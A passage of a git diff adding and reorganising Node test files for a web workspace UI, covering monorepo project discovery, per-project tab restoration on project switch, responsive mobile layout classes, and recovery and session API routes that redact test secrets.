+    assert.equal(results.length, 1, `Expected 1 project, got ${results.length}: ${results.map(r => r.name).join(", ")}`);
+    assert.equal(results[0].path, monorepoPnpm);
+    assert.equal(results[0].name, basename(monorepoPnpm));
+    assert.equal(results[0].signals.isMonorepo, true);
+  });
+
+  test("lerna monorepo root returns single project entry", () => {
+    const results = discoverProjects(monorepoLerna);
+    assert.equal(results.length, 1);
+    assert.equal(results[0].path, monorepoLerna);
+    assert.equal(results[0].signals.isMonorepo, true);
+  });
+
+  test("npm/yarn workspaces monorepo root returns single project entry", () => {
+    const results = discoverProjects(monorepoWorkspaces);
+    assert.equal(results.length, 1);
+    assert.equal(results[0].path, monorepoWorkspaces);
+    assert.equal(results[0].signals.isMonorepo, true);
+  });
+
+  test("turbo monorepo root returns single project entry", () => {
+    const results = discoverProjects(monorepoTurbo);
+    assert.equal(results.length, 1);
+    assert.equal(results[0].path, monorepoTurbo);
+  });
+
+  test("nx monorepo root returns single project entry", () => {
+    const results = discoverProjects(monorepoNx);
+    assert.equal(results.length, 1);
+    assert.equal(results[0].path, monorepoNx);
+  });
+
+  test("plain project (not monorepo) scans children normally", () => {
+    // plainProject has .git, package.json, src/ — not a monorepo
+    // Should scan children: just "src"
+    const results = discoverProjects(plainProject);
+    assert.ok(results.length >= 1, "should scan children for non-monorepo");
+    assert.ok(results.some(r => r.name === "src"), "should find src directory");
+  });
+
+  test("monorepo entry has correct kind (brownfield when no .gsd)", () => {
+    const results = discoverProjects(monorepoPnpm);
+    assert.equal(results[0].kind, "brownfield");
+  });
+});
diff --git a/src/tests/integration/web-project-tab-preservation.test.ts b/src/tests/integration/web-project-tab-preservation.test.ts
new file mode 100644
index 000000000..4b7b5d2d1
--- /dev/null
+++ b/src/tests/integration/web-project-tab-preservation.test.ts
@@ -0,0 +1,243 @@
+import test, { describe } from "node:test";
+import assert from "node:assert/strict";
+
+// ---------------------------------------------------------------------------
+// Test: project switching preserves the active tab (view) instead of
+// resetting to dashboard.
+//
+// Bug #2711: Switching projects always returns to dashboard.
+//
+// Root cause: handleSelectProject in ProjectsPanel dispatched
+//   gsd:navigate-view with { view: "dashboard" } on every switch.
+//   Additionally, the viewRestored flag in WorkspaceChrome was never
+//   reset when the project changed, so the per-project sessionStorage
+//   restore could not fire for the new project.
+//
+// These tests validate the corrected logic in isolation, without needing
+// a full React DOM.
+// ---------------------------------------------------------------------------
+
+// ── Simulated sessionStorage (mirrors browser sessionStorage API) ────────
+
+class MockSessionStorage {
+  private store = new Map<string, string>();
+
+  getItem(key: string): string | null {
+    return this.store.get(key) ?? null;
+  }
+
+  setItem(key: string, value: string): void {
+    this.store.set(key, value);
+  }
+
+  removeItem(key: string): void {
+    this.store.delete(key);
+  }
+
+  clear(): void {
+    this.store.clear();
+  }
+}
+
+// ── Mirrors the KNOWN_VIEWS set and viewStorageKey from app-shell.tsx ─────
+
+const KNOWN_VIEWS = new Set([
+  "dashboard",
+  "power",
+  "chat",
+  "roadmap",
+  "files",
+  "activity",
+  "visualize",
+]);
+
+function viewStorageKey(projectCwd: string): string {
+  return `gsd-active-view:${projectCwd}`;
+}
+
+// ── Simulated WorkspaceChrome view-restore logic ─────────────────────────
+// This mirrors the useEffect in WorkspaceChrome that restores the persisted
+// view when projectPath changes — with the fix applied.
+
+interface ChromeState {
+  activeView: string;
+  viewRestored: boolean;
+  projectPath: string | null;
+}
+
+/**
+ * Simulates the view-restore effect.
+ * In the fixed code, viewRestored resets to false when projectPath changes,
+ * allowing the stored view to be read for the new project.
+ */
+function simulateViewRestoreEffect(
+  state: ChromeState,
+  storage: MockSessionStorage,
+): ChromeState {
+  // The fix: if projectPath changed, reset viewRestored
+  // (In React this is a separate useEffect that depends on [projectPath])
+  if (!state.viewRestored && state.projectPath) {
+    const stored = storage.getItem(viewStorageKey(state.projectPath));
+    if (stored && KNOWN_VIEWS.has(stored)) {
+      return { ...state, activeView: stored, viewRestored: true };
+    }
+    return { ...state, viewRestored: true };
+  }
+  return state;
+}
+
+/**
+ * Simulates switching to a new project path.
+ * The fix resets viewRestored so the restore effect can fire for the new project.
+ */
+function simulateProjectSwitch(
+  state: ChromeState,
+  newProjectPath: string,
+): ChromeState {
+  return {
+    ...state,
+    projectPath: newProjectPath,
+    viewRestored: false, // <-- THE FIX: reset so restore runs for new project
+  };
+}
+
+// ── Simulated handleSelectProject (pre-fix vs post-fix) ──────────────────
+
+/** Pre-fix: always navigates to dashboard on project switch */
+function handleSelectProjectPreFix(
+  _state: ChromeState,
+  _projectPath: string,
+): string {
+  // Bug: always forces dashboard
+  return "dashboard";
+}
+
+/** Post-fix: does NOT override the active view */
+function handleSelectProjectPostFix(
+  state: ChromeState,
+  _projectPath: string,
+): string {
+  // Fix: preserve whatever view is active (restore logic handles per-project view)
+  return state.activeView;
+}
+
+// ---------------------------------------------------------------------------
+// Tests
+// ---------------------------------------------------------------------------
+
+describe("project switch tab preservation (#2711)", () => {
+  test("BUG: pre-fix handleSelectProject always resets to dashboard", () => {
+    const state: ChromeState = {
+      activeView: "roadmap",
+      viewRestored: true,
+      projectPath: "/projects/alpha",
+    };
+
+    const viewAfterSwitch = handleSelectProjectPreFix(state, "/projects/beta");
+    // This demonstrates the bug: user was on "roadmap" but got sent to "dashboard"
+    assert.equal(viewAfterSwitch, "dashboard");
+  });
+
+  test("FIX: post-fix handleSelectProject preserves current view", () => {
+    const state: ChromeState = {
+      activeView: "roadmap",
+      viewRestored: true,
+      projectPath: "/projects/alpha",
+    };
+
+    const viewAfterSwitch = handleSelectProjectPostFix(state, "/projects/beta");
+    assert.equal(viewAfterSwitch, "roadmap", "Should preserve the current tab");
+  });
+
+  test("FIX: viewRestored resets on project switch, enabling per-project view restore", () => {
+    const storage = new MockSessionStorage();
+    storage.setItem(viewStorageKey("/projects/alpha"), "files");
+    storage.setItem(viewStorageKey("/projects/beta"), "activity");
+
+    // Start on project alpha, viewing files
+    let state: ChromeState = {
+      activeView: "dashboard",
+      viewRestored: false,
+      projectPath: "/projects/alpha",
+    };
+
+    // Initial restore for alpha
+    state = simulateViewRestoreEffect(state, storage);
+    assert.equal(state.activeView, "files");
+    assert.equal(state.viewRestored, true);
+
+    // Switch to project beta
+    state = simulateProjectSwitch(state, "/projects/beta");
+    assert.equal(state.viewRestored, false, "viewRestored should reset on project switch");
+
+    // Restore effect fires for beta
+    state = simulateViewRestoreEffect(state, storage);
+    assert.equal(state.activeView, "activity", "Should restore beta's persisted view");
+  });
+
+  test("FIX: switching to project with no stored view keeps current view", () => {
+    const storage = new MockSessionStorage();
+    // Only alpha has a stored view
+    storage.setItem(viewStorageKey("/projects/alpha"), "roadmap");
+
+    let state: ChromeState = {
+      activeView: "roadmap",
+      viewRestored: true,
+      projectPath: "/projects/alpha",
+    };
+
+    // Switch to gamma (no stored view)
+    state = simulateProjectSwitch(state, "/projects/gamma");
+    state = simulateViewRestoreEffect(state, storage);
+
+    // Should keep the current view since gamma has no stored preference
+    assert.equal(state.activeView, "roadmap", "Should keep current view when new project has no stored view");
+  });
+
+  test("FIX: stored view for invalid view name is ignored", () => {
+    const storage = new MockSessionStorage();
+    storage.setItem(viewStorageKey("/projects/alpha"), "nonexistent-view");
+
+    let state: ChromeState = {
+      activeView: "power",
+      viewRestored: false,
+      projectPath: "/projects/alpha",
+    };
+
+    state = simulateViewRestoreEffect(state, storage);
+    // Invalid stored view should be ignored, keeping current view
+    assert.equal(state.activeView, "power");
+  });
+
+  test("FIX: rapid project switches each get a fresh restore", () => {
+    const storage = new MockSessionStorage();
+    storage.setItem(viewStorageKey("/projects/a"), "chat");
+    storage.setItem(viewStorageKey("/projects/b"), "visualize");
+    storage.setItem(viewStorageKey("/projects/c"), "files");
+
+    let state: ChromeState = {
+      activeView: "dashboard",
+      viewRestored: false,
+      projectPath: "/projects/a",
+    };
+
+    // Restore for A
+    state = simulateViewRestoreEffect(state, storage);
+    assert.equal(state.activeView, "chat");
+
+    // Switch to B
+    state = simulateProjectSwitch(state, "/projects/b");
+    state = simulateViewRestoreEffect(state, storage);
+    assert.equal(state.activeView, "visualize");
+
+    // Switch to C
+    state = simulateProjectSwitch(state, "/projects/c");
+    state = simulateViewRestoreEffect(state, storage);
+    assert.equal(state.activeView, "files");
+
+    // Switch back to A
+    state = simulateProjectSwitch(state, "/projects/a");
+    state = simulateViewRestoreEffect(state, storage);
+    assert.equal(state.activeView, "chat", "Should restore A's view again after switching away and back");
+  });
+});
diff --git a/src/tests/web-project-url.test.ts b/src/tests/integration/web-project-url.test.ts
similarity index 97%
rename from src/tests/web-project-url.test.ts
rename to src/tests/integration/web-project-url.test.ts
index 350b94354..bbe9f918c 100644
--- a/src/tests/web-project-url.test.ts
+++ b/src/tests/integration/web-project-url.test.ts
@@ -1,7 +1,7 @@
 import test from "node:test"
 import assert from "node:assert/strict"
 
-import { buildProjectAbsoluteUrl, buildProjectPath } from "../../web/lib/project-url.ts"
+import { buildProjectAbsoluteUrl, buildProjectPath } from "../../../web/lib/project-url.ts"
 
 test("buildProjectPath leaves non-project routes unchanged", () => {
   assert.equal(buildProjectPath("/api/terminal/input"), "/api/terminal/input")
diff --git a/src/tests/web-recovery-diagnostics-contract.test.ts b/src/tests/integration/web-recovery-diagnostics-contract.test.ts
similarity index 76%
rename from src/tests/web-recovery-diagnostics-contract.test.ts
rename to src/tests/integration/web-recovery-diagnostics-contract.test.ts
index b3cace09d..110d96e8c 100644
--- a/src/tests/web-recovery-diagnostics-contract.test.ts
+++ b/src/tests/integration/web-recovery-diagnostics-contract.test.ts
@@ -8,8 +8,8 @@ import { PassThrough } from "node:stream"
 import { StringDecoder } from "node:string_decoder"
 
 const repoRoot = process.cwd()
-const bridge = await import("../web/bridge-service.ts")
-const recoveryRoute = await import("../../web/app/api/recovery/route.ts")
+const bridge = await import("../../web/bridge-service.ts")
+const recoveryRoute = await import("../../../web/app/api/recovery/route.ts")
 
 class FakeRpcChild extends EventEmitter {
   stdin = new PassThrough()
@@ -209,7 +209,7 @@ function fakeSessionState(sessionId: string, sessionPath?: string) {
   }
 }
 
-test("/api/recovery returns structured recovery diagnostics and redacts secrets", async () => {
+test("/api/recovery returns structured recovery diagnostics and redacts secrets", async (t) => {
   const fixture = makeRecoveryFixture()
   const sessionPath = createRecoverySessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-recovery")
   const harness = createHarness((command, current) => {
@@ -247,39 +247,39 @@ test("/api/recovery returns structured recovery diagnostics and redacts secrets"
     }),
   })
 
-  try {
-    const response = await recoveryRoute.GET()
-    assert.equal(response.status, 200)
-    const payload = await response.json() as any
-
-    assert.equal(payload.status, "ready")
-    assert.equal(payload.project.activeSessionPath, sessionPath)
-    assert.equal(payload.project.activeSessionId, "sess-recovery")
-    assert.equal(payload.bridge.retry.inProgress, true)
-    assert.equal(payload.bridge.retry.attempt, 2)
-    assert.equal(payload.bridge.authRefresh.phase, "failed")
-    assert.match(payload.bridge.authRefresh.label, /failed/i)
-    assert.ok(typeof payload.doctor.total === "number")
-    assert.ok(Array.isArray(payload.doctor.codes))
-    assert.ok(typeof payload.validation.total === "number")
-    assert.equal(payload.interruptedRun.detected, true)
-    assert.match(payload.interruptedRun.lastError ?? "", /\[redacted\]/)
-    assert.deepEqual(
-      payload.actions.browser.map((action: { id: string }) => action.id),
-      ["refresh_diagnostics", "refresh_workspace", "open_retry_controls", "open_resume_controls", "open_auth_controls"],
-    )
-    assert.ok(payload.actions.commands.some((entry: { command: string }) => entry.command.includes("/gsd doctor")))
-
-    const serialized = JSON.stringify(payload)
-    assert.doesNotMatch(serialized, /sk-test-recovery-secret-9999|sk-onboarding-secret-1234/)
-    assert.doesNotMatch(serialized, /Crash Recovery Briefing|Completed Tool Calls|toolCallId/)
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests()
     fixture.cleanup()
-  }
+  });
+
+  const response = await recoveryRoute.GET()
+  assert.equal(response.status, 200)
+  const payload = await response.json() as any
+
+  assert.equal(payload.status, "ready")
+  assert.equal(payload.project.activeSessionPath, sessionPath)
+  assert.equal(payload.project.activeSessionId, "sess-recovery")
+  assert.equal(payload.bridge.retry.inProgress, true)
+  assert.equal(payload.bridge.retry.attempt, 2)
+  assert.equal(payload.bridge.authRefresh.phase, "failed")
+  assert.match(payload.bridge.authRefresh.label, /failed/i)
+  assert.ok(typeof payload.doctor.total === "number")
+  assert.ok(Array.isArray(payload.doctor.codes))
+  assert.ok(typeof payload.validation.total === "number")
+  assert.equal(payload.interruptedRun.detected, true)
+  assert.match(payload.interruptedRun.lastError ?? "", /\[redacted\]/)
+  assert.deepEqual(
+    payload.actions.browser.map((action: { id: string }) => action.id),
+    ["refresh_diagnostics", "refresh_workspace", "open_retry_controls", "open_resume_controls", "open_auth_controls"],
+  )
+  assert.ok(payload.actions.commands.some((entry: { command: string }) => entry.command.includes("/gsd doctor")))
+
+  const serialized = JSON.stringify(payload)
+  assert.doesNotMatch(serialized, /sk-test-recovery-secret-9999|sk-onboarding-secret-1234/)
+  assert.doesNotMatch(serialized, /Crash Recovery Briefing|Completed Tool Calls|toolCallId/)
 })
 
-test("/api/recovery prefers the current-project resumable session when the live bridge session is out of scope", async () => {
+test("/api/recovery prefers the current-project resumable session when the live bridge session is out of scope", async (t) => {
   const fixture = makeRecoveryFixture()
   const sessionPath = createRecoverySessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-recovery")
   const externalSessionPath = join(fixture.projectCwd, "..", "agent-sessions", "2026-03-15T03-40-00-000Z_sess-external.jsonl")
@@ -308,26 +308,26 @@ test("/api/recovery prefers the current-project resumable session when the live
     getOnboardingState: async () => readyOnboardingState(),
   })
 
-  try {
-    const response = await recoveryRoute.GET()
-    assert.equal(response.status, 200)
-    const payload = await response.json() as any
-
-    assert.equal(payload.project.activeSessionPath, sessionPath)
-    assert.equal(payload.project.activeSessionId, "sess-recovery")
-    assert.equal(payload.interruptedRun.detected, true)
-    assert.match(payload.interruptedRun.lastError ?? "", /\[redacted\]/)
-    assert.deepEqual(
-      payload.actions.browser.map((action: { id: string }) => action.id),
-      ["refresh_diagnostics", "refresh_workspace", "open_retry_controls", "open_resume_controls"],
-    )
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests()
     fixture.cleanup()
-  }
+  });
+
+  const response = await recoveryRoute.GET()
+  assert.equal(response.status, 200)
+  const payload = await response.json() as any
+
+  assert.equal(payload.project.activeSessionPath, sessionPath)
+  assert.equal(payload.project.activeSessionId, "sess-recovery")
+  assert.equal(payload.interruptedRun.detected, true)
+  assert.match(payload.interruptedRun.lastError ?? "", /\[redacted\]/)
+  assert.deepEqual(
+    payload.actions.browser.map((action: { id: string }) => action.id),
+    ["refresh_diagnostics", "refresh_workspace", "open_retry_controls", "open_resume_controls"],
+  )
 })
 
-test("/api/recovery returns a structured empty-project payload without leaking raw diagnostics", async () => {
+test("/api/recovery returns a structured empty-project payload without leaking raw diagnostics", async (t) => {
   const fixture = makeEmptyProjectFixture()
   const harness = createHarness((command, current) => {
     if (command.type === "get_state") {
@@ -359,22 +359,22 @@ test("/api/recovery returns a structured empty-project payload without leaking r
     getOnboardingState: async () => readyOnboardingState(),
   })
 
-  try {
-    const response = await recoveryRoute.GET()
-    assert.equal(response.status, 200)
-    const payload = await response.json() as any
-
-    assert.ok(["ready", "unavailable"].includes(payload.status))
-    assert.equal(payload.project.activeScope, null)
-    assert.equal(payload.validation.total, 0)
-    assert.ok(typeof payload.doctor.total === "number")
-    assert.ok(typeof payload.interruptedRun.available === "boolean")
-    assert.deepEqual(
-      payload.actions.browser.map((action: { id: string }) => action.id),
-      ["refresh_diagnostics", "refresh_workspace"],
-    )
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests()
     fixture.cleanup()
-  }
+  });
+
+  const response = await recoveryRoute.GET()
+  assert.equal(response.status, 200)
+  const payload = await response.json() as any
+
+  assert.ok(["ready", "unavailable"].includes(payload.status))
+  assert.equal(payload.project.activeScope, null)
+  assert.equal(payload.validation.total, 0)
+  assert.ok(typeof payload.doctor.total === "number")
+  assert.ok(typeof payload.interruptedRun.available === "boolean")
+  assert.deepEqual(
+    payload.actions.browser.map((action: { id: string }) => action.id),
+    ["refresh_diagnostics", "refresh_workspace"],
+  )
 })
diff --git a/src/tests/integration/web-responsive.test.ts b/src/tests/integration/web-responsive.test.ts
new file mode 100644
index 000000000..f159103e7
--- /dev/null
+++ b/src/tests/integration/web-responsive.test.ts
@@ -0,0 +1,144 @@
+/**
+ * Structural tests verifying mobile-responsive CSS classes exist in key web UI components.
+ *
+ * These tests read the source files and assert that responsive Tailwind classes
+ * (md:, sm:, lg:, xl:) and mobile-specific markup are present where expected.
+ */
+
+import test from 'node:test'
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import { resolve } from 'node:path'
+
+const WEB_ROOT = resolve(import.meta.dirname, '../../../web')
+
+function readComponent(relativePath: string): string {
+  return readFileSync(resolve(WEB_ROOT, relativePath), 'utf-8')
+}
+
+// ── layout.tsx ──────────────────────────────────────────────────────────────
+
+test('layout.tsx exports a Viewport with device-width', () => {
+  const src = readComponent('app/layout.tsx')
+  assert.ok(src.includes("Viewport"), 'should import Viewport type from next')
+  assert.ok(src.includes("device-width"), 'should set width to device-width')
+  assert.ok(src.includes("maximumScale"), 'should set maximumScale for mobile')
+})
+
+// ── app-shell.tsx ───────────────────────────────────────────────────────────
+
+test('app-shell.tsx has a mobile hamburger menu toggle', () => {
+  const src = readComponent('components/gsd/app-shell.tsx')
+  assert.ok(src.includes('mobile-nav-toggle'), 'should have mobile-nav-toggle test id')
+  assert.ok(src.includes('Menu'), 'should import Menu icon for hamburger')
+})
+
+test('app-shell.tsx hides desktop sidebar on mobile with md:flex', () => {
+  const src = readComponent('components/gsd/app-shell.tsx')
+  // The desktop sidebar wrapper should use hidden + md:flex
+  assert.ok(src.includes('hidden md:flex'), 'desktop sidebar should be hidden on mobile')
+})
+
+test('app-shell.tsx has a mobile nav drawer', () => {
+  const src = readComponent('components/gsd/app-shell.tsx')
+  assert.ok(src.includes('mobile-nav-drawer'), 'should have mobile-nav-drawer test id')
+  assert.ok(src.includes('mobile-nav-overlay'), 'should have mobile-nav-overlay test id')
+})
+
+test('app-shell.tsx has a mobile milestone drawer', () => {
+  const src = readComponent('components/gsd/app-shell.tsx')
+  assert.ok(src.includes('mobile-milestone-drawer'), 'should have mobile-milestone-drawer test id')
+  assert.ok(src.includes('mobile-milestone-toggle'), 'should have mobile-milestone-toggle test id')
+})
+
+test('app-shell.tsx has a mobile bottom bar', () => {
+  const src = readComponent('components/gsd/app-shell.tsx')
+  assert.ok(src.includes('mobile-bottom-bar'), 'should have mobile-bottom-bar test id')
+})
+
+test('app-shell.tsx header uses responsive padding', () => {
+  const src = readComponent('components/gsd/app-shell.tsx')
+  assert.ok(src.includes('md:px-4'), 'header should have responsive horizontal padding')
+})
+
+test('app-shell.tsx hides project label on small screens', () => {
+  const src = readComponent('components/gsd/app-shell.tsx')
+  assert.ok(src.includes('hidden sm:inline'), 'project label should be hidden on mobile')
+})
+
+test('app-shell.tsx hides desktop milestone sidebar on mobile', () => {
+  const src = readComponent('components/gsd/app-shell.tsx')
+  // The milestone sidebar resize handle should be hidden on mobile
+  assert.ok(
+    src.includes('hidden md:flex') || src.includes('hidden md:block'),
+    'milestone sidebar should be hidden on mobile',
+  )
+})
+
+// ── sidebar.tsx ──────────────────────────────────────────────────────────────
+
+test('sidebar.tsx supports a mobile prop', () => {
+  const src = readComponent('components/gsd/sidebar.tsx')
+  assert.ok(src.includes('mobile?:'), 'Sidebar should accept a mobile prop')
+  assert.ok(src.includes('mobile?: boolean'), 'mobile prop should be boolean')
+})
+
+test('sidebar.tsx has a MobileNavPanel with touch-friendly targets', () => {
+  const src = readComponent('components/gsd/sidebar.tsx')
+  assert.ok(src.includes('mobile-nav-panel'), 'should have mobile-nav-panel test id')
+  assert.ok(src.includes('min-h-[44px]'), 'nav items should have 44px minimum touch target height')
+})
+
+// ── dashboard.tsx ───────────────────────────────────────────────────────────
+
+test('dashboard.tsx has responsive grid for metric cards', () => {
+  const src = readComponent('components/gsd/dashboard.tsx')
+  assert.ok(src.includes('sm:grid-cols-2'), 'metric grid should stack to 2 cols on sm')
+  assert.ok(src.includes('xl:grid-cols-4'), 'metric grid should expand to 4 cols on xl')
+})
+
+test('dashboard.tsx has responsive padding on content area', () => {
+  const src = readComponent('components/gsd/dashboard.tsx')
+  assert.ok(src.includes('md:p-6'), 'content area should have responsive padding')
+})
+
+test('dashboard.tsx has responsive header padding', () => {
+  const src = readComponent('components/gsd/dashboard.tsx')
+  assert.ok(src.includes('md:px-6'), 'dashboard header should have responsive horizontal padding')
+})
+
+// ── status-bar.tsx ──────────────────────────────────────────────────────────
+
+test('status-bar.tsx hides branch info on small screens', () => {
+  const src = readComponent('components/gsd/status-bar.tsx')
+  // Branch info should be hidden on mobile
+  assert.ok(
+    src.includes('hidden sm:flex'),
+    'branch info should use hidden sm:flex for responsive display',
+  )
+})
+
+test('status-bar.tsx has responsive text sizing', () => {
+  const src = readComponent('components/gsd/status-bar.tsx')
+  assert.ok(src.includes('md:text-xs'), 'status bar should have responsive text size')
+})
+
+test('status-bar.tsx has responsive gap spacing', () => {
+  const src = readComponent('components/gsd/status-bar.tsx')
+  assert.ok(src.includes('md:gap-4'), 'status bar should have responsive gap')
+})
+
+// ── globals.css ─────────────────────────────────────────────────────────────
+
+test('globals.css has mobile touch target styles', () => {
+  const src = readComponent('../web/app/globals.css')
+  assert.ok(src.includes('max-width: 767px'), 'should have a mobile media query')
+  assert.ok(src.includes('mobile-touch-target'), 'should define mobile-touch-target class')
+  assert.ok(src.includes('min-height: 44px'), 'touch targets should be at least 44px')
+})
+
+test('globals.css has mobile sidebar drawer styles', () => {
+  const src = readComponent('../web/app/globals.css')
+  assert.ok(src.includes('mobile-sidebar-drawer'), 'should define mobile-sidebar-drawer class')
+  assert.ok(src.includes('mobile-sidebar-overlay'), 'should define mobile-sidebar-overlay class')
+})
diff --git a/src/tests/web-session-parity-contract.test.ts b/src/tests/integration/web-session-parity-contract.test.ts
similarity index 73%
rename from src/tests/web-session-parity-contract.test.ts
rename to src/tests/integration/web-session-parity-contract.test.ts
index 0b52a6504..9e8b1afcf 100644
--- a/src/tests/web-session-parity-contract.test.ts
+++ b/src/tests/integration/web-session-parity-contract.test.ts
@@ -9,11 +9,11 @@ import { PassThrough } from "node:stream"
 import { StringDecoder } from "node:string_decoder"
 
 const repoRoot = process.cwd()
-const bridge = await import("../web/bridge-service.ts")
-const onboarding = await import("../web/onboarding-service.ts")
-const browserRoute = await import("../../web/app/api/session/browser/route.ts")
-const manageRoute = await import("../../web/app/api/session/manage/route.ts")
-const gitRoute = await import("../../web/app/api/git/route.ts")
+const bridge = await import("../../web/bridge-service.ts")
+const onboarding = await import("../../web/onboarding-service.ts")
+const browserRoute = await import("../../../web/app/api/session/browser/route.ts")
+const manageRoute = await import("../../../web/app/api/session/manage/route.ts")
+const gitRoute = await import("../../../web/app/api/git/route.ts")
 const { AuthStorage } = await import("@gsd/pi-coding-agent")
 
 class FakeRpcChild extends EventEmitter {
@@ -234,7 +234,7 @@ function configureBridgeFixture(
   })
 }
 
-test("/api/session/browser stays current-project scoped and carries threaded/search metadata outside /api/boot", async () => {
+test("/api/session/browser stays current-project scoped and carries threaded/search metadata outside /api/boot", async (t) => {
   const fixture = makeWorkspaceFixture()
   const rootPath = createSessionFile({
     projectCwd: fixture.projectCwd,
@@ -313,48 +313,48 @@ test("/api/session/browser stays current-project scoped and carries threaded/sea
 
   configureBridgeFixture(fixture, harness)
 
-  try {
-    const response = await browserRoute.GET(new Request("http://localhost/api/session/browser"))
-    assert.equal(response.status, 200)
-    const payload = await response.json() as any
-
-    assert.equal(payload.project.scope, "current_project")
-    assert.equal(payload.project.cwd, fixture.projectCwd)
-    assert.equal(payload.project.sessionsDir, fixture.sessionsDir)
-    assert.equal(payload.project.activeSessionPath, childPath)
-    assert.equal(payload.totalSessions, 3)
-    assert.equal(payload.returnedSessions, 3)
-    assert.equal(payload.sessions.some((session: any) => session.path === outsidePath), false)
-
-    const child = payload.sessions.find((session: any) => session.id === "sess-child")
-    assert.ok(child)
-    assert.equal(child.parentSessionPath, rootPath)
-    assert.equal(child.firstMessage, "Investigate the branch rename")
-    assert.equal(child.isActive, true)
-    assert.equal(child.depth, 1)
-    assert.deepEqual(child.ancestorHasNextSibling, [false])
-    assert.equal("allMessagesText" in child, false)
-
-    const searchResponse = await browserRoute.GET(
-      new Request("http://localhost/api/session/browser?query=api-session-browser&sortMode=relevance&nameFilter=named"),
-    )
-    assert.equal(searchResponse.status, 200)
-    const searchPayload = await searchResponse.json() as any
-
-    assert.equal(searchPayload.totalSessions, 3)
-    assert.equal(searchPayload.returnedSessions, 1)
-    assert.equal(searchPayload.query.sortMode, "relevance")
-    assert.equal(searchPayload.query.nameFilter, "named")
-    assert.equal(searchPayload.sessions[0].id, "sess-named")
-    assert.equal(searchPayload.sessions[0].name, "Release Notes")
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests()
     onboarding.resetOnboardingServiceForTests()
     fixture.cleanup()
-  }
+  });
+
+  const response = await browserRoute.GET(new Request("http://localhost/api/session/browser"))
+  assert.equal(response.status, 200)
+  const payload = await response.json() as any
+
+  assert.equal(payload.project.scope, "current_project")
+  assert.equal(payload.project.cwd, fixture.projectCwd)
+  assert.equal(payload.project.sessionsDir, fixture.sessionsDir)
+  assert.equal(payload.project.activeSessionPath, childPath)
+  assert.equal(payload.totalSessions, 3)
+  assert.equal(payload.returnedSessions, 3)
+  assert.equal(payload.sessions.some((session: any) => session.path === outsidePath), false)
+
+  const child = payload.sessions.find((session: any) => session.id === "sess-child")
+  assert.ok(child)
+  assert.equal(child.parentSessionPath, rootPath)
+  assert.equal(child.firstMessage, "Investigate the branch rename")
+  assert.equal(child.isActive, true)
+  assert.equal(child.depth, 1)
+  assert.deepEqual(child.ancestorHasNextSibling, [false])
+  assert.equal("allMessagesText" in child, false)
+
+  const searchResponse = await browserRoute.GET(
+    new Request("http://localhost/api/session/browser?query=api-session-browser&sortMode=relevance&nameFilter=named"),
+  )
+  assert.equal(searchResponse.status, 200)
+  const searchPayload = await searchResponse.json() as any
+
+  assert.equal(searchPayload.totalSessions, 3)
+  assert.equal(searchPayload.returnedSessions, 1)
+  assert.equal(searchPayload.query.sortMode, "relevance")
+  assert.equal(searchPayload.query.nameFilter, "named")
+  assert.equal(searchPayload.sessions[0].id, "sess-named")
+  assert.equal(searchPayload.sessions[0].name, "Release Notes")
 })
 
-test("/api/session/manage renames the active session through bridge-aware RPC instead of mutating the file directly", async () => {
+test("/api/session/manage renames the active session through bridge-aware RPC instead of mutating the file directly", async (t) => {
   const fixture = makeWorkspaceFixture()
   const activePath = createSessionFile({
     projectCwd: fixture.projectCwd,
@@ -415,35 +415,35 @@ test("/api/session/manage renames the active session through bridge-aware RPC in
     } as any),
   })
 
-  try {
-    const response = await manageRoute.POST(
-      new Request("http://localhost/api/session/manage", {
-        method: "POST",
-        body: JSON.stringify({
-          action: "rename",
-          sessionPath: activePath,
-          name: "Active Renamed",
-        }),
-      }),
-    )
-    const payload = await response.json() as any
-    await waitForMicrotasks()
-
-    assert.equal(response.status, 200)
-    assert.equal(payload.success, true)
-    assert.equal(payload.sessionPath, activePath)
-    assert.equal(payload.isActiveSession, true)
-    assert.equal(payload.mutation, "rpc")
-    assert.ok(harness.commands.some((command) => command.type === "set_session_name" && command.name === "Active Renamed"))
-    assert.equal(getLatestSessionName(activePath), "Before Active Rename")
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests()
     onboarding.resetOnboardingServiceForTests()
     fixture.cleanup()
-  }
+  });
+
+  const response = await manageRoute.POST(
+    new Request("http://localhost/api/session/manage", {
+      method: "POST",
+      body: JSON.stringify({
+        action: "rename",
+        sessionPath: activePath,
+        name: "Active Renamed",
+      }),
+    }),
+  )
+  const payload = await response.json() as any
+  await waitForMicrotasks()
+
+  assert.equal(response.status, 200)
+  assert.equal(payload.success, true)
+  assert.equal(payload.sessionPath, activePath)
+  assert.equal(payload.isActiveSession, true)
+  assert.equal(payload.mutation, "rpc")
+  assert.ok(harness.commands.some((command) => command.type === "set_session_name" && command.name === "Active Renamed"))
+  assert.equal(getLatestSessionName(activePath), "Before Active Rename")
 })
 
-test("/api/session/manage renames inactive sessions via authoritative session-file mutation and rejects out-of-scope paths", async () => {
+test("/api/session/manage renames inactive sessions via authoritative session-file mutation and rejects out-of-scope paths", async (t) => {
   const fixture = makeWorkspaceFixture()
   const activePath = createSessionFile({
     projectCwd: fixture.projectCwd,
@@ -520,131 +520,127 @@ test("/api/session/manage renames inactive sessions via authoritative session-fi
     } as any),
   })
 
-  try {
-    const renameResponse = await manageRoute.POST(
-      new Request("http://localhost/api/session/manage", {
-        method: "POST",
-        body: JSON.stringify({
-          action: "rename",
-          sessionPath: inactivePath,
-          name: "Inactive Renamed",
-        }),
-      }),
-    )
-    const renamePayload = await renameResponse.json() as any
-
-    assert.equal(renameResponse.status, 200)
-    assert.equal(renamePayload.success, true)
-    assert.equal(renamePayload.isActiveSession, false)
-    assert.equal(renamePayload.mutation, "session_file")
-    assert.equal(getLatestSessionName(inactivePath), "Inactive Renamed")
-    assert.equal(harness.commands.some((command) => command.type === "set_session_name"), false)
-
-    const outsideResponse = await manageRoute.POST(
-      new Request("http://localhost/api/session/manage", {
-        method: "POST",
-        body: JSON.stringify({
-          action: "rename",
-          sessionPath: outsidePath,
-          name: "Should Fail",
-        }),
-      }),
-    )
-    const outsidePayload = await outsideResponse.json() as any
-
-    assert.equal(outsideResponse.status, 404)
